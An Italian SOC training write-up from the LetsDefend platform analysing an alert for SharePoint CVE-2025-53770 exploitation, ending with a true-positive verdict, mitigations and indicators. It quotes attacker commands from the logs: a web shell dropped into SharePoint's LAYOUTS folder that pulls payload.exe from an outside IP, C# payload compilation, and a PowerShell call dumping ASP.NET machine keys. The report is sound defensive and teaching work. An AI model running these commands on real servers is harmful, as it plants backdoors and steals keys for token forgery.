Un'attività per allenare le capacità di analisi e reporting
Questa è un'indagine condotta sulla piattaforma Let's Defend, basata su una recente CVE di SharePoint. Diamo un'occhiata.
La regola SOC342 ha rilevato una richiesta POST non autenticata rivolta alla pagina vulnerabile ToolPane.aspx, con le seguenti caratteristiche:
un payload di grandi dimensioni (Content-Length: 7699)
un referer sospetto (SignOut.aspx) probabilmente usato per offuscare l'origine
comportamento coerente con lo sfruttamento della vulnerabilità ToolShell
Un utente esterno (IP: 107.191.58.76) ha inviato una richiesta appositamente predisposta a un server SharePoint interno (172.16.20.17).
Analizza il log del nostro endpoint
Un processo w3wp.exe che esegue un comando PowerShell codificato può indicare un potenziale exploit o un'attività post-exploitation (ad esempio, esecuzione di un payload nascosto).
In un ambiente SharePoint, è importante verificare se questo comportamento è atteso o se rappresenta un abuso.
Il comando è stato offuscato usando base64
Questo payload consente all'attaccante di estrarre e stampare chiavi critiche di configurazione ASP.NET dalla macchina su cui viene eseguito.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Compila un eseguibile dal codice sorgente C# sul server.
Crea una backdoor web (file ASPX dannoso) nel percorso di SharePoint che, quando viene visitata, consente di eseguire o scaricare un payload esterno.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Questo comando crea un file chiamato spinstall0.aspx nella cartella LAYOUTS di SharePoint e vi scrive il contenuto (qui è un segnaposto che rappresenta il codice di una webshell).
Questo è l'hash di spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Diamo un'occhiata su VirusTotal.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Questo comando consente all'attaccante di accedere alla configurazione dell'applicazione di MachineKeySection, che può esporre chiavi crittografiche sensibili come la chiave di convalida e la chiave di decrittografia.
Queste chiavi sono fondamentali per la sicurezza di ASP.NET, poiché proteggono elementi come i cookie di autenticazione e ViewState.
Esporre o recuperare queste chiavi può consentire agli attaccanti di forgiare token di autenticazione, decrittare dati protetti o eseguire altri attacchi contro l'applicazione web.
MITRE ATT&CK

Nota dell'analista:
L'avviso è stato generato a causa di un'insolita attività di PowerShell osservata su un server SharePoint, successivamente identificata come un tentativo di sfruttamento della CVE-2025-53770. L'attaccante ha inizialmente rilasciato e compilato un eseguibile C# personalizzato (payload.exe) usando il compilatore C# (csc.exe), quindi ha creato una webshell ASPX dannosa (spinstall0.aspx) all'interno di una directory di SharePoint accessibile via web. Successivamente, è stato eseguito un comando PowerShell per recuperare chiavi macchina crittografiche sensibili dalla configurazione del server tramite reflection .NET. Questa sequenza di azioni suggerisce un attacco multifase progettato per mantenere un controllo persistente e possibilmente forgiare token di autenticazione. La webshell è stata verificata come dannosa con un tasso di rilevamento VirusTotal di 39/62. L'incidente è confermato come vero positivo e si consigliano ulteriori misure di contenimento e bonifica.

Dettaglio CVE-2025-53770
La deserializzazione di dati non attendibili in Microsoft SharePoint Server on-premises consente a un attaccante non autorizzato di eseguire codice su una rete. Microsoft è a conoscenza che esiste in natura un exploit per la CVE-2025-53770. Microsoft sta preparando e testando completamente un aggiornamento completo per risolvere questa vulnerabilità. Nel frattempo, assicurarsi che la mitigazione fornita nella documentazione di questa CVE sia attiva per essere protetti dallo sfruttamento.

Mitigazione suggerita da Microsoft:
Per mitigare potenziali attacchi, i clienti dovrebbero:
Utilizzare versioni supportate di SharePoint Server on-premises
Applicare gli ultimi aggiornamenti di sicurezza collegati sopra.
Distribuire Microsoft Defender for Endpoint, o soluzioni equivalenti per la protezione dalle minacce
Assicurarsi che Antimalware Scan Interface (AMSI) sia attivato e configurato correttamente, con una soluzione antivirus appropriata come Defender Antivirus
Ruotare le chiavi macchina ASP.NET di SharePoint Server
IoC
Spinstall0.aspx Web shell utilizzata dagli attori delle minacce
Gli attori hanno anche modificato il nome del file in vari modi, ad esempio spinstall.aspx, spinstall1.aspx, spinstall2.aspx
Questo report si basa su un'attività condotta sulla piattaforma Let's Defend. Tutti i risultati e i materiali presentati sono solo a scopo didattico. Tutti i diritti e la proprietà appartengono a Let's Defend.